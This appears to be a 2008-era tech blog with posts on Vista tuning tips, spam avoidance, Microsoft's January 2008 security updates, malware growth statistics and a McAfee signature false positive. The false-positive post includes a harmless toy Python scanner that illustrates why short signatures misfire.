    Windows Vista - 12 Tips To Boost Your PC's Performance
    http://www.informationweek.com/news/showArticle.jhtml?articleID=204701251

    QUOTE: Soon after Windows Vista came out, many suggestions for tweaking the operating system to improve performance emerged. Unfortunately, most of those tweaks turned out to be pretty disappointing: they either provided the illusion of better performance but did nothing of substance, or they were rehashes of existing Windows XP tips that might not even be valid on Vista.
     
    Still, there are plenty of things that can be done to make Vista run better. Over the past several months I've kept an eye peeled as to what actually works, what doesn't, and why. With less work than you might think, it's entirely possible to have Vista running quite snappily.
     
    SUMMARY OF VISTA TUNING RECOMMENDATIONS

    1. Add more memory (esp. when you buy a new system - 2GB or more)
    2. Find Out What's Hogging Your System (analyze impacts to performance)
    3. Get Rid Of Anything You Don't Need (start-ups)
    4. Tune The Vista Search Index (turn off if you don't use it)
    5. Tune System Restore (once per week instead of daily if space is limited)
    6. Use A Second Hard Drive To Parallelize Operations
    7. Tune Defrag, But Not To Excess
    8. Try ReadyBoost, But Don't Throw A Lot Of Money At It (USB Flash drives for caching might help)
    9. Install Your Updates (e.g., 938194, 938979, and 941649, which should be installed in that order; these will eventually be included in SP1 when it is available later this year)
    10. Check For Other Driver Updates
    11. Tune Windows Defender
    12. Turn off some of the "Eye Candy" (e.g., Aero flying-window effects)

    Below is another good thread that shares tips for improving Vista performance:

    CNET Forums - Tips on improving Vista performance
    http://forums.cnet.com/5208-10149_102-0.html?forumID=7&threadID=275745

  • SPAM Email - Best Practices to reduce inflows

    Below are some ideas shared in a security forum this morning.  Please remember that there are no magic formulas to eliminate spam.  Spam represents about 70-90% of all email traffic on the Internet.

    HOME USERS

    - Be careful online and safeguard your privacy (e.g., don't reveal your email address except when you have to and only then to a trusted site)
    - Ensure your system is malware-free.  It is always important to ensure no viruses, spyware, or other malware is present that could transmit these addresses to spammers.
    - Don't post email addresses in online forums, social networking websites, or untrusted web forms.  For example, if you share an email address directly within a public post, there are "robotic spiders" which crawl webpages and may harvest it.  You're okay registering on a forum, as admins lock down and hide registration email addresses.
    - Never reply to spam or use the opt-out links at the bottom of the messages. Spammers then know they've got a "good address", and these rascals aren't ethical enough to remove you either.  Finally, the opt-out URL may itself be malicious.
    - Use bcc (blind carbon copy) or group name techniques when sending email to others (so spammers don't hit the jackpot).  Educate and encourage friends and family to do likewise.
    - If an email account gets overloaded with spam, change to a brand new email account and start the process all over again.
    - Technical safeguards like spam filtering within an email product (e.g., Outlook, Thunderbird), or even a separately purchased spam filtering package, may help.  These work well, although some valid email messages may be caught in the spam filters, so the spam folder should be reviewed before it is emptied.

    CORPORATE USERS

    - Web filtering + AV + content filtering software in the DMZ or firewall are highly recommended (e.g., corporate version of Barracuda; multiple AVs, etc.)
    - MIME compliance testing - messages that violate the standard can be filtered out in the DMZ
    - Security Awareness - teach spam avoidance concepts to your user community

  • Microsoft Security Updates - January 2008

    Microsoft has issued a few important security updates that should be applied promptly.  These updates worked well on both of my XP PCs at work and will require a reboot.

    Microsoft Security Updates - January 2008
    http://www.microsoft.com/technet/security/bulletin/ms08-jan.mspx

    * MS08-001 - Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
    * MS08-002 - Vulnerability in LSASS Could Allow Local Elevation of Privilege (943485)

    Microsoft also released Non-Security, High-Priority Updates on MU, WU, and WSUS:
    - Five non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
    - Two non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.

     

  • Malware - Anti-Virus Vendors struggled to keep us protected during 2007

    Security vendors are always trying to hit a moving target when it comes to malware attacks. During 2007, the number of new malware agents increased dramatically. Much of this is attributed to highly polymorphic malware packaging techniques and unique "waves" of trojan horse attacks.  For example, trojan horse construction kits allow malware to be packed using numerous available compression algorithms, so each packed copy looks different to signature-based scanners. Also, Storm worm malware patterns found on server templates changed on an hourly basis, according to one report I had read.

    While we didn't have 250,000 brand new unique viruses as F-Secure shares, we had thousands of  "close cousins" within the same virus family. Trojan horses are unique attacks that don't replicate on the infected PCs and have been around since the dawn of malware. During 2007, there was "wave after wave" of unique trojan horse attacks (including the Storm worm and other botnets). Each wave represents a unique pattern AV vendors had to provide coverage for during each round of attacks.

    Unfortunately, we'll see more of the same (if not worse) in 2008. I had also read that only 30% of AV vendors have signatures ready within 24 hours of an attack wave, so it is imperative to always follow the best practices of avoidance on any email that appears suspicious (even from someone you know).


    AVERT - A banner year for malware, digital threats and the security industry
    http://www.avertlabs.com/research/blog/index.php/2008/01/07/a-banner-year-for-malware-digital-threats-and-the-security-industry/

    QUOTE: On January 2, 2007, we posted the first DAT files (4930) of the new year. On that day, the public count of threats detected stood at 221,935. Fast-forward to December 31, when we released the last DAT (5196) of 2007, and the public count of threats detected finished at an almost unbelievable 357,820. That’s a total of 135,885 unique threats that we at Avert Labs identified throughout 2007. But let me put that into further context:

    • 372 new detections per calendar day in 2007
    • 527 new detections per business day in 2007
    • One driver written every 4 minutes in 2007
    • 38% of all detections were added this year.

    25,438 more detections were added this year than in 2005 and 2006 combined. (Those two years totaled 110,447.)


    F-Secure - Up to 1/2 Million Malware Detections
    http://www.f-secure.com/weblog/archives/00001351.html

    QUOTE: Our recent Data Security Wrap-up predicted we'd reach half-a-million malware detections by the end of the year. And in fact — we did reach 500K of detections during the last week of December. Quite the way to end 2007. So now we've had a bit of rest and are recharged for the year ahead. That's a good thing too because we predict that 2008 will be busier than ever.


    F-Secure - IT Security Threat Summary for H2 2007
    http://www.f-secure.com/2007/2/index.html

    QUOTE: What previously took twenty years to accumulate — was now accumulated in just one year
    At the start of 2007 — our number of malware detections equaled a quarter-million. At the end of 2007, the estimates are to be equal to half-a-million. 

    This graph from F-Secure illustrates how difficult 2007 was for the providers of AV protection:

  • McAfee DAT 5197 - Creating JS/Exploit False Positives

    A "false positive" is where legitimate programs are detected as a virus. Virus signature strings are only dozens of characters long, and sometimes a legitimate script or executable contains code closely resembling the virus somewhere within the larger file itself. DAT 5198 was released promptly by AVERT Labs to correct this issue. Most users should have updated to 5198 automatically. Anyone still on DAT 5197 should move to the corrected DAT. Use HELP / ABOUT on the Shield or background scanner to find out which version you are running.
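    The mechanism described above (a signature string only a few dozen characters long colliding with ordinary code in a legitimate script), shown as an added example; this is not code from the post, McAfee or AVERT, and every file name and script body below is a constructed, harmless stand-in:

```python
"""Toy signature scanner: why a short signature string produces false positives.

Added example, not code from the post or from McAfee/AVERT. Every sample is a
constructed, harmless string standing in for a script file on a web page.
"""
import re

# Constructed samples: the (hypothetical) file a signature was cut from, two
# legitimate pages that decode markup the same way, and one clean utility file.
SAMPLES = {
    "bad_sample.js": "var z7='%3Cb%3E';z7=z7.replace(/#/g,'');document.write(unescape(z7));",
    "sports_ad_loader.js": "var m='%3Cdiv%20id%3Dad%3E';document.write(unescape(m));",
    "social_widget.js": "function show(h){document.write(unescape(h));} show('%3Cimg%3E');",
    "clean_util.js": "function add(a,b){return a+b;}",
}
TRULY_BAD = {"bad_sample.js"}

# A literal signature only a few dozen characters long, as the post describes.
# It is a common, legitimate idiom, so it collides with benign scripts.
SHORT_SIG = "document.write(unescape("

# A longer signature anchored on more of the bad sample's distinctive context:
# the filler-stripping step immediately before the decode-and-write.
LONG_SIG = re.compile(r"\.replace\(/#/g,''\);document\.write\(unescape\(")

def scan_short(text: str) -> bool:
    """Plain substring match, the simplest form of a string signature."""
    return SHORT_SIG in text

def scan_long(text: str) -> bool:
    """Context-anchored match: precise, but a 'close cousin' that changes the filler escapes it."""
    return LONG_SIG.search(text) is not None

def evaluate(samples: dict, truly_bad: set) -> dict:
    """Run both signatures over the corpus and report hits, misses and false positives."""
    report = {}
    for name, scanner in (("short", scan_short), ("long", scan_long)):
        flagged = sorted(f for f, body in samples.items() if scanner(body))
        report[name] = {
            "flagged": flagged,
            "missed": sorted(truly_bad - set(flagged)),
            "false_positives": [f for f in flagged if f not in truly_bad],
        }
    return report

if __name__ == "__main__":
    for sig, result in evaluate(SAMPLES, TRULY_BAD).items():
        print(f"{sig:5} flagged={result['flagged']} false_positives={result['false_positives']}")
```

    The trade-off is the one the vendors face: the short signature catches the sample and both legitimate pages, while the longer one is precise but must be re-issued for every variant that alters the surrounding context.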

    McAfee DAT 5197 - Creating JS/Exploit False Positives
    http://isc.sans.org/diary.html?storyid=3803

    QUOTE: Some users reported that their AV was detecting JS/Exploit-BO virus, on sites like ESPN and Friendster, for instance. The problem is with the McAfee AV. McAfee just released an Emergency DAT to fix the false on some JavaScripts, detecting as JS/Exploit-BO on virus database (DAT file) 5197 released today.
